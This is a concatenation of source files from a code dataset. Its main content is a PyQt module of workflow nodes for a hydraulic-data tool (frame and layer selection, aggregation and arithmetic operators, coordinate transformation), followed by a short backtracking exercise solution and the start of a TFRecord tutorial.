self.selection.startValue.setEnabled(False)\n self.selection.endValue.setEnabled(False)\n\n self.selection.startIndex.editingFinished.connect(slider.enterIndexEvent)\n self.selection.endIndex.editingFinished.connect(slider.enterIndexEvent)\n\n self.selection.timeSamplig.editingFinished.connect(self._check)\n self.selection.timeSamplig.setText(str(self.sampling_frequency))\n\n if self.start_index > -1:\n self.selection.startIndex.setText(str(self.start_index+1))\n self.selection.endIndex.setText(str(self.end_index+1))\n slider.enterIndexEvent()\n\n option_panel = QWidget()\n layout = QVBoxLayout()\n layout.addSpacerItem(QSpacerItem(10, 10))\n layout.addWidget(slider)\n layout.addWidget(self.selection)\n option_panel.setLayout(layout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _check(self):\n try:\n sampling_frequency = int(self.selection.timeSamplig.text())\n if sampling_frequency < 1:\n self.selection.timeSamplig.setText(str(self.sampling_frequency))\n except ValueError:\n self.selection.timeSamplig.setText(str(self.sampling_frequency))\n\n def _select(self):\n start_index = int(self.selection.startIndex.text())-1\n end_index = int(self.selection.endIndex.text())-1\n sampling_frequency = int(self.selection.timeSamplig.text())\n self.new_options = (start_index, end_index, sampling_frequency)\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if len(self.in_data.selected_time_indices) != len(self.in_data.time):\n self.state = Node.NOT_CONFIGURED\n elif self.start_date is not None:\n new_time = list(map(lambda x: x + self.in_data.start_time, self.in_data.time_second))\n if self.start_date in new_time:\n self.start_index = new_time.index(self.start_date)\n self.state = Node.READY\n else:\n self.start_index = -1\n self.start_date = None\n self.end_index = -1\n self.end_date = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n return\n if self.end_date in new_time:\n self.end_index = new_time.index(self.end_date)\n self.state = Node.READY\n else:\n self.start_index = -1\n self.start_date = None\n self.end_index = -1\n self.end_date = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n return\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n 
QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if len(self.in_data.selected_time_indices) != len(self.in_data.time):\n QMessageBox.critical(None, 'Error', 'Cannot re-select time.',\n QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.start_index, self.end_index, self.sampling_frequency = self.new_options\n self.start_date, self.end_date = self.in_data.start_time + self.in_data.time_second[self.start_index], \\\n self.in_data.start_time + self.in_data.time_second[self.end_index]\n self.reconfigure_downward()\n\n def save(self):\n if self.start_date is None:\n str_start_date = ''\n str_end_date = ''\n else:\n str_start_date = self.start_date.strftime('%Y/%m/%d %H:%M:%S')\n str_end_date = self.end_date.strftime('%Y/%m/%d %H:%M:%S')\n\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()),\n str_start_date, str_end_date, str(self.sampling_frequency)])\n\n def load(self, options):\n start_date, end_date = options[0:2]\n if start_date:\n self.start_date = datetime.datetime.strptime(start_date, '%Y/%m/%d %H:%M:%S')\n self.end_date = datetime.datetime.strptime(end_date, '%Y/%m/%d %H:%M:%S')\n self.sampling_frequency = int(options[2])\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n self.data.selected_time_indices = list(range(self.start_index, self.end_index+1, self.sampling_frequency))\n self.success('You selected %d frames.' % len(self.data.selected_time_indices))\n\n\nclass SelectSingleFrameNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nSingle\\nFrame'\n self.out_port.data_type = ('slf', 'slf 3d', 'slf geom')\n self.in_port.data_type = ('slf', 'slf 3d')\n self.in_data = None\n self.data = None\n\n self.selection = -1\n self.date = None\n self.slider = None\n self.new_option = -1\n\n def get_option_panel(self):\n self.slider = SimpleTimeDateSelection()\n self.slider.initTime(self.in_data.time, list(map(lambda x: x + self.in_data.start_time,\n self.in_data.time_second)))\n if self.selection > -1:\n self.slider.index.setText(str(self.selection+1))\n self.slider.slider.enterIndexEvent()\n self.slider.updateSelection()\n\n option_panel = QWidget()\n layout = QVBoxLayout()\n layout.addSpacerItem(QSpacerItem(10, 10))\n layout.addWidget(self.slider)\n option_panel.setLayout(layout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _select(self):\n self.new_option = int(self.slider.index.text()) - 1\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if len(self.in_data.selected_time_indices) != len(self.in_data.time):\n self.state = Node.NOT_CONFIGURED\n elif self.date is not None:\n new_time = list(map(lambda x: x + self.in_data.start_time, self.in_data.time_second))\n if self.date in new_time:\n self.selection = new_time.index(self.date)\n self.state = Node.READY\n else:\n self.selection = -1\n self.date = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n 
self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if len(self.in_data.selected_time_indices) != len(self.in_data.time):\n QMessageBox.critical(None, 'Error', 'Cannot re-select time.',\n QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.selection = self.new_option\n self.date = self.in_data.start_time + self.in_data.time_second[self.selection]\n self.reconfigure_downward()\n\n def save(self):\n if self.date is None:\n str_date = ''\n else:\n str_date = self.date.strftime('%Y/%m/%d %H:%M:%S')\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), str_date])\n\n def load(self, options):\n if options[0]:\n self.date = datetime.datetime.strptime(options[0], '%Y/%m/%d %H:%M:%S')\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n self.data.selected_time_indices = [self.selection]\n self.success()\n\n\nclass SelectSingleLayerNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nSingle\\nLayer'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf 3d',)\n self.in_data = None\n self.data = None\n\n ## Layer index (1-indexed) selection\n self.layer_selection = -1\n self.layer_type_box = None\n self.new_option = -1\n self.output_panel = None\n\n def get_option_panel(self):\n self.layer_type_box = QComboBox()\n self.layer_type_box.setFixedHeight(30)\n self.layer_type_box.setMaximumWidth(200)\n for iplan in range(self.in_data.header.nb_planes):\n self.layer_type_box.addItem('Layer %d' % (iplan + 1))\n if self.layer_selection > 0:\n self.layer_type_box.setCurrentIndex(self.layer_selection - 1)\n\n option_panel = QWidget()\n layout = QVBoxLayout()\n layout.addSpacerItem(QSpacerItem(10, 10))\n hlayout = QHBoxLayout()\n hlayout.addWidget(QLabel('Select the layer'))\n hlayout.addWidget(self.layer_type_box)\n layout.addLayout(hlayout)\n option_panel.setLayout(layout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _select(self):\n self.new_option = self.layer_type_box.currentIndex() + 1\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n self.state = Node.NOT_CONFIGURED\n if self.layer_selection > 0:\n if self.layer_selection <= self.in_data.header.nb_planes + 1:\n self.state = Node.READY\n self.reconfigure_downward()\n 
self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if 'vertical_operator' in self.in_data.metadata:\n QMessageBox.critical(None, 'Error', 'Cannot re-select layer, already 2D.', QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.layer_selection = self.new_option\n self.reconfigure_downward()\n\n def save(self):\n if self.layer_selection is not None:\n vertical_operator = self.layer_selection\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), str(vertical_operator)])\n\n def load(self, options):\n if options[0]:\n self.layer_selection = int(options[0])\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if input_data.header.is_2d:\n self.fail('the input file is not 3d')\n return\n if 'Z' not in input_data.selected_vars:\n self.fail('the variable Z is not found')\n return\n self.data = input_data.copy()\n self.data.operator = operations.SELECT_LAYER\n self.data.metadata['layer_selection'] = self.layer_selection\n self.success()\n\n\nclass VerticalAggregationNode(OneInOneOutNode):\n VERTICAL_OPERATIONS = ('Mean', 'Min', 'Max')\n DEFAULT_OPERATOR = 0 # `Mean`\n\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Vertical\\nAggregation'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf 3d',)\n self.in_data = None\n self.data = None\n\n ## Vertical operation among 'Max', 'Min' or 'Mean'\n self.vertical_operation = None\n self.vertical_operation_box = None\n self.new_option = -1\n self.output_panel = None\n\n def get_option_panel(self):\n option_panel = QWidget()\n vlayout = QVBoxLayout()\n vlayout.addWidget(QLabel('Operation over the vertical'))\n self.vertical_operation_box = QButtonGroup(option_panel)\n self.vertical_operation_box.setExclusive(True)\n for operation_name in VerticalAggregationNode.VERTICAL_OPERATIONS:\n button = QRadioButton(operation_name)\n if operation_name == self.vertical_operation:\n button.setChecked(True)\n self.vertical_operation_box.addButton(button)\n vlayout.addWidget(button)\n 
option_panel.setLayout(vlayout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _get_default_option(self):\n return VerticalAggregationNode.VERTICAL_OPERATIONS[VerticalAggregationNode.DEFAULT_OPERATOR]\n\n def _select(self):\n if self.vertical_operation_box.checkedButton() is not None:\n operation = self.vertical_operation_box.checkedButton().text()\n self.new_option = operation\n else:\n self.new_option = None\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n self.state = Node.READY\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if 'vertical_operator' in self.in_data.metadata:\n QMessageBox.critical(None, 'Error', 'Cannot re-define an operation over the vertical!', QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.vertical_operation = self.new_option\n self.reconfigure_downward()\n\n def save(self):\n if self.vertical_operation is None:\n vertical_operator = self._get_default_option()\n else:\n vertical_operator = self.vertical_operation\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), str(vertical_operator)])\n\n def load(self, options):\n self.vertical_operation = options[0]\n if self.vertical_operation not in VerticalAggregationNode.VERTICAL_OPERATIONS:\n raise NotImplementedError('Vertical operation %s is not supported' % self.vertical_operation)\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if input_data.header.is_2d:\n self.fail('the input file is not 3d')\n return\n if 'Z' not in input_data.selected_vars:\n self.fail('the variable Z is not found')\n return\n self.data = input_data.copy()\n self.data.operator = operations.VERTICAL_AGGREGATION\n self.data.metadata['vertical_operator'] = self.vertical_operation\n self.success()\n\n\nclass SynchMaxNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Operators'\n self.label = 'SynchMax'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf',)\n self.in_data = None\n self.data = 
None\n\n self.var = ''\n self.var_box = None\n self.new_option = ''\n\n def get_option_panel(self):\n self.var_box = QComboBox()\n self.var_box.setFixedHeight(30)\n available_vars = self.in_data.selected_vars\n for var in available_vars:\n self.var_box.addItem(var)\n if self.var:\n self.var_box.setCurrentIndex(available_vars.index(self.var))\n\n option_panel = QWidget()\n layout = QVBoxLayout()\n layout.addSpacerItem(QSpacerItem(10, 10))\n hlayout = QHBoxLayout()\n hlayout.addWidget(QLabel('Select the reference variable'))\n hlayout.addWidget(self.var_box)\n layout.addLayout(hlayout)\n option_panel.setLayout(layout)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _select(self):\n self.new_option = self.var_box.currentText()\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if not self.in_data.header.is_2d or len(self.in_data.selected_time_indices) == 1:\n self.state = Node.NOT_CONFIGURED\n elif self.in_data.operator is not None:\n self.state = Node.NOT_CONFIGURED\n elif self.var:\n available_vars = self.in_data.selected_vars\n if self.var in available_vars:\n self.state = Node.READY\n else:\n self.var = ''\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = parent_node.data\n if not self.in_data.header.is_2d:\n QMessageBox.critical(None, 'Error', 'The input file is not 2D.', QMessageBox.Ok)\n return\n if len(self.in_data.selected_time_indices) <= 1:\n QMessageBox.critical(None, 'Error', 'The input file must have more than one frame.', QMessageBox.Ok)\n return\n if self.state != Node.SUCCESS:\n self._reset()\n if super().configure():\n self.var = self.new_option\n self.reconfigure_downward()\n\n def save(self):\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), self.var])\n\n def load(self, options):\n self.var = options[0]\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n self.data.operator = operations.SYNCH_MAX\n self.data.metadata = {'var': self.var}\n self.success()\n\n\nclass 
UnaryOperatorNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.state = Node.READY\n self.data = None\n self.message = 'Nothing to configure.'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf',)\n\n def reconfigure(self):\n super().reconfigure()\n self.state = Node.READY\n self.reconfigure_downward()\n\n def configure(self, check=None):\n if super().configure():\n self.reconfigure_downward()\n\n def run(self):\n pass\n\n\nclass BinaryOperatorNode(TwoInOneOutNode):\n def __init__(self, index, operator=None):\n super().__init__(index)\n self.operator = operator\n self.state = Node.READY\n self.data = None\n self.message = 'Nothing to configure.'\n self.out_port.data_type = ('slf out',)\n self.first_in_port.data_type = ('slf', 'slf reference')\n self.second_in_port.data_type = ('slf',)\n\n def reconfigure(self):\n super().reconfigure()\n self.state = Node.READY\n self.reconfigure_downward()\n\n def configure(self, check=None):\n if super().configure():\n self.reconfigure_downward()\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.first_in_port.mother.parentItem().data\n if not input_data.header.is_2d:\n self.fail('the input file is not 2D')\n return\n if input_data.filename == self.second_in_port.mother.parentItem().data.filename:\n self.fail('the two inputs cannot be from the same file.')\n return\n\n self.data = input_data.copy()\n self.data.operator = self.operator\n self.data.metadata = {'operand': self.second_in_port.mother.parentItem().data.copy()}\n self.success()\n\n\nclass ConvertToSinglePrecisionNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Convert to\\nSingle\\nPrecision'\n self.out_port.data_type = ('slf', 'slf 3d')\n self.in_port.data_type = ('slf', 'slf 3d')\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if not input_data.header.is_double_precision():\n self.fail('the input file is not of double-precision format.')\n return\n if input_data.to_single:\n self.fail('the input data is already converted to single-precision format.')\n return\n\n self.data = input_data.copy()\n self.data.to_single = True\n self.success()\n\n\nclass SelectFirstFrameNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nFirst\\nFrame'\n self.out_port.data_type = ('slf', 'slf 3d', 'slf geom')\n self.in_port.data_type = ('slf', 'slf 3d')\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if len(input_data.selected_time_indices) != len(input_data.time):\n self.fail('cannot re-select time.')\n return\n\n self.data = input_data.copy()\n self.data.selected_time_indices = [0]\n self.success()\n\n\nclass SelectLastFrameNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nLast\\nFrame'\n self.out_port.data_type = ('slf', 'slf 3d', 'slf geom')\n self.in_port.data_type = ('slf', 'slf 3d')\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if len(input_data.selected_time_indices) != 
len(input_data.time):\n self.fail('cannot re-select time.')\n return\n\n self.data = input_data.copy()\n self.data.selected_time_indices = [len(input_data.time)-1]\n self.success()\n\n\nclass ComputeMaxNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Operators'\n self.label = 'Max'\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if not input_data.header.is_2d:\n self.fail('the input file is not 2D')\n return\n if len(input_data.selected_time_indices) == 1:\n self.fail('the input data must have more than one frame')\n return\n\n self.data = input_data.copy()\n self.data.operator = operations.MAX\n self.success()\n\n\nclass ComputeMinNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Operators'\n self.label = 'Min'\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if not input_data.header.is_2d:\n self.fail('the input file is not 2D')\n return\n if len(input_data.selected_time_indices) == 1:\n self.fail('the input data must have more than one frame')\n return\n\n self.data = input_data.copy()\n self.data.operator = operations.MIN\n self.success()\n\n\nclass ComputeMeanNode(UnaryOperatorNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Operators'\n self.label = 'Mean'\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if not input_data.header.is_2d:\n self.fail('the input file is not 2D')\n return\n if len(input_data.selected_time_indices) == 1:\n self.fail('the input data must have more than one frame')\n return\n\n self.data = input_data.copy()\n self.data.operator = operations.MEAN\n self.success()\n\n\nclass MinusNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.DIFF)\n self.category = 'Operators'\n self.label = 'A Minus B'\n\n\nclass ReverseMinusNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.REV_DIFF)\n self.category = 'Operators'\n self.label = 'B Minus A'\n\n\nclass ProjectMeshNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.PROJECT)\n self.category = 'Operators'\n self.label = 'Project B\\non A'\n\n\nclass MaxBetweenNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.MAX_BETWEEN)\n self.category = 'Operators'\n self.label = 'Max(A,B)'\n\n\nclass MinBetweenNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.MIN_BETWEEN)\n self.category = 'Operators'\n self.label = 'Min(A,B)'\n\n\nclass AddTransformationNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Add\\nTrans-\\nformation'\n self.name_ = 'Add Transformation'\n self.in_port.data_type = ('slf', 'slf 3d')\n self.out_port.data_type = ('slf geom', 'slf', 'slf 3d')\n self.filename = ''\n self.data = None\n\n self.map = None\n self.from_index = -1\n self.to_index = -1\n self.transformation = None\n\n self.name_box = None\n self.from_box = None\n self.to_box = None\n self.new_transformation = None\n self.new_options = tuple()\n\n def name(self):\n return self.name_\n\n def 
get_option_panel(self):\n self.new_transformation = self.transformation\n conf_box = QGroupBox('Apply coordinate transformation')\n conf_box.setStyleSheet('QGroupBox {font-size: 12px;font-weight: bold;}')\n open_button = QPushButton('Load\\nTransformation')\n open_button.setToolTip('Open a transformation config file')\n open_button.setFixedSize(105, 50)\n self.name_box = QLineEdit()\n self.name_box.setReadOnly(True)\n self.name_box.setFixedHeight(30)\n self.from_box = QComboBox()\n self.from_box.setFixedWidth(150)\n self.to_box = QComboBox()\n self.to_box.setFixedWidth(150)\n\n if self.transformation is not None:\n for label in self.new_transformation.labels:\n self.from_box.addItem(label)\n self.to_box.addItem(label)\n self.from_box.setCurrentIndex(self.from_index)\n self.to_box.setCurrentIndex(self.to_index)\n self.name_box.setText(self.filename)\n\n option_panel = QWidget()\n vlayout = QVBoxLayout()\n hlayout = QHBoxLayout()\n hlayout.addWidget(open_button)\n hlayout.addWidget(self.name_box)\n vlayout.addLayout(hlayout)\n\n hlayout = QHBoxLayout()\n hlayout.addWidget(QLabel(' Transform from'))\n hlayout.addWidget(self.from_box)\n hlayout.addWidget(QLabel('to'))\n hlayout.addWidget(self.to_box)\n hlayout.setAlignment(Qt.AlignLeft)\n vlayout.addLayout(hlayout)\n vlayout.setSpacing(15)\n conf_box.setLayout(vlayout)\n\n layout = QVBoxLayout()\n layout.addWidget(conf_box)\n option_panel.setLayout(layout)\n open_button.clicked.connect(self._open)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _open(self):\n filename, _ = QFileDialog.getOpenFileName(None, 'Open a transformation configuration file', '',\n 'All file (*)', QDir.currentPath(),\n options=QFileDialog.Options() | QFileDialog.DontUseNativeDialog)\n if not filename:\n return\n success, self.new_transformation = load_transformation_map(filename)\n if not success:\n QMessageBox.critical(None, 'Error', 'The configuration is not valid.', QMessageBox.Ok)\n return\n self.name_box.setText(filename)\n for label in self.new_transformation.labels:\n self.from_box.addItem(label)\n self.to_box.addItem(label)\n\n def _check(self):\n if self.new_transformation is None:\n return 0\n elif self.from_box.currentIndex() == self.to_box.currentIndex():\n QMessageBox.critical(None, 'Error', 'The two systems cannot be identical!', QMessageBox.Ok)\n return 1\n return 2\n\n def _select(self):\n from_index, to_index = self.from_box.currentIndex(), self.to_box.currentIndex()\n self.new_options = (self.new_transformation, from_index, to_index, self.name_box.text())\n\n def configure(self, check=None):\n if super().configure(self._check):\n self.transformation, self.from_index, self.to_index, self.filename = self.new_options\n self.reconfigure_downward()\n\n def save(self):\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), self.filename, str(self.from_index),\n str(self.to_index)])\n\n def load(self, options):\n filename, from_index, to_index = options\n if not filename:\n return\n try:\n with open(filename):\n pass\n except FileNotFoundError:\n self.state = Node.NOT_CONFIGURED\n return\n success, transformation = load_transformation_map(filename)\n if not success:\n self.state = Node.NOT_CONFIGURED\n return\n from_index, to_index = int(from_index), int(to_index)\n if from_index not in transformation.nodes or to_index not in transformation.nodes:\n self.state = Node.NOT_CONFIGURED\n return\n self.filename = filename\n self.transformation = transformation\n self.from_index = 
from_index\n self.to_index = to_index\n self.state = Node.READY\n self.update()\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if 'transformation' in input_data.metadata:\n self.fail('cannot re-apply transformation.')\n return\n\n trans = self.transformation.get_transformation(self.from_index, self.to_index)\n self.data = input_data.copy()\n self.data.transform_mesh(trans)\n self.data.metadata['transformation'] = trans\n self.success()\n","repo_name":"CNR-Engineering/PyTelTools","sub_path":"pyteltools/workflow/nodes_op.py","file_name":"nodes_op.py","file_ext":"py","file_size_in_byte":63692,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"41"} +{"seq_id":"791883065","text":"def dfs(level):\n global MIN, total\n if level == n:\n if MIN > total:\n MIN = total\n return\n if MIN <= total:\n return\n\n for i in range(n):\n if visited[i] == 0:\n visited[i] = 1\n total += arr[level][i]\n dfs(level+1)\n visited[i] = 0\n total -= arr[level][i]\n\nt = int(input())\nfor tc in range(1, t+1):\n n = int(input())\n arr = [list(map(int, input().split())) for _ in range(n)]\n visited = [0] * n\n MIN = 21e8\n total = 0\n dfs(0)\n print(f'#{tc} {MIN}')\n\n\n","repo_name":"moonthree/algorithm2","sub_path":"swea_lecture/13_backtracking/01_최소 생산 비용.py","file_name":"01_최소 생산 비용.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"74918574203","text":"\"\"\"\nTFRecord数据集制作\nTFRecord是TensorFlow官方推荐的一种{key,value}二进制序列化的数据集格式\n制作好后就是一个二进制的文件,使用起来更加方便\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport glob\nimport os\n\n\n# tf.Example中可以使用以下几种格式:\n# tf.train.BytesList: 可以使用的类型包括 string和byte\n# tf.train.FloatList: 可以使用的类型包括 float和double\n# tf.train.Int64List: 可以使用的类型包括 enum,bool, int32, uint32, int64\n\n# 